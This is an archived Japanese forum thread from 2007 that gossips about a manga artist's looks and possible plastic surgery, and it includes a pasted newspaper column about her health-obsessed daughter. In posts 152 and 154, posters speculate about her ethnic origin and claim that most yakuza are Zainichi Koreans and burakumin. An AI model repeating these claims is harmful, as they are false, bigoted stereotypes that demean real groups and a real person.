え〜〜きもいw普通に整形でしょ。

152 :花と名無しさん:2007/01/24(水) 18:18:49 ID:???0
きみどりって半島出身でしょ。
それなら整形しててもおかしくないよ。
あっちの人は整形が当たり前だからさ。
広島はヤクザが多いし、ジェシーのエピソードからそっち系だって予想がつく。
ヤクザの9割が在とBだからきみどりがその可能性は高い。
自分の本名だけ明かさないのも怪しい。

153 :花と名無しさん:2007/01/24(水) 21:13:22 ID:???O
話が飛躍しすぎだよ。
整形話から変な流れになってきたなぁ。
そろそろ河北新報のうpお願いしまーす。

154 :花と名無しさん:2007/01/24(水) 21:48:46 ID:???0
何でも他人のせいするところは半島体質と言えるなw

155 :花と名無しさん:2007/01/25(木) 00:12:48 ID:???0
おばさん、悪いんだけどさここはsage進行なんだよね
sage方解らんかったら初心者板で練習して来てよ
空気読めないアフォは、ここじゃなくても叩かれるから
この機会に勉強してくるといいよ。 じゃまたね

156 :花と名無しさん:2007/01/25(木) 00:31:48 ID:???O
ひーちゃん乙

157 :花と名無しさん:2007/01/25(木) 00:45:33 ID:???0
>>153
お待たせ、最近仕事がきつくてコピペしてる余裕がなかった。

 わが家の娘1号は自他ともに認める「健康オタク」。無農薬野菜を水から煮
ただけの野菜スープや、カツオだしで煮ただけの大根を離乳食として育ったせ
いか、小さいころから肉料理より魚料理を喜び、ジャンクフードには目もくれ
ません。「おかゆと焼き魚が一番のごちそう」と目を細めながら言っては「こ
の子は母親にご飯を作ってもらってないのか?」と周囲から誤解されることも
しばしば。

 彼女のたっての希望で実現した週に一度の「地味メシの日」は、納豆と玄米、
みそ汁だけの質素な食卓に大喜びし、踊りながら席につくほどです。そして健
康オタクの彼女のモットーは「食べたら動く」。万年ダイエッターでリバウン
ド女王の私としては耳が痛い一言ですが、その精神にのっとって、ここ数年、
彼女が続けているのが縄跳びとバレエのレッスンです。「動いたら食べる」も
また彼女のポリシーで、レッスンの後、みんなでおやつを分け合って食べるの
が楽しみになっているようです。

 しかし、そこは健康オタクの娘1号。持参するおやつは健康重視のビミョー
な物ばかりで、とても思春期を迎えようとしている女の子たちが喜びそうなシ
ロものではありません。ある日、黒豆と昆布を乾燥させただけの健康食品が自
宅にあったので「まさかこんな物は食べないだろう」と冗談半分で持たせてみ
ると、小さなバレリーナたちは大喜びしていたとのこと。

 翌週持っていった干しイチジクも大ウケ、その次の週に持っていった煮干し
などは、かれんなレオタードを着た女の子たちが「煮干しちょうだい、ちょう
だい」と猫のようにニャーニャー言いながら群がって来たというのですから驚
きました。類は友を呼ぶとはこのことでしょうか。

 先月行われたバレエの発表会で優雅に踊る娘と女の子たちを見て、休憩時間
に喜々として煮干しを食べている彼女たちの姿を誰が想像したでしょう。健康
オタクの友を得た娘の勢いは加速するばかりです。

158 :花と名無しさん:2007/01/25(木) 01:54:58 ID:???0
「子供なんか〜」では赤ちゃんのポチの食事の世話はほぼひーちゃんが
やってたみたいに描いてたのにこれ読むときみどりが手をかけてたようだw


159 :花と名無しさん:2007/01/25(木) 02:07:18 ID:???0
>>149
整形しても微妙な顔だね・・・

38 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)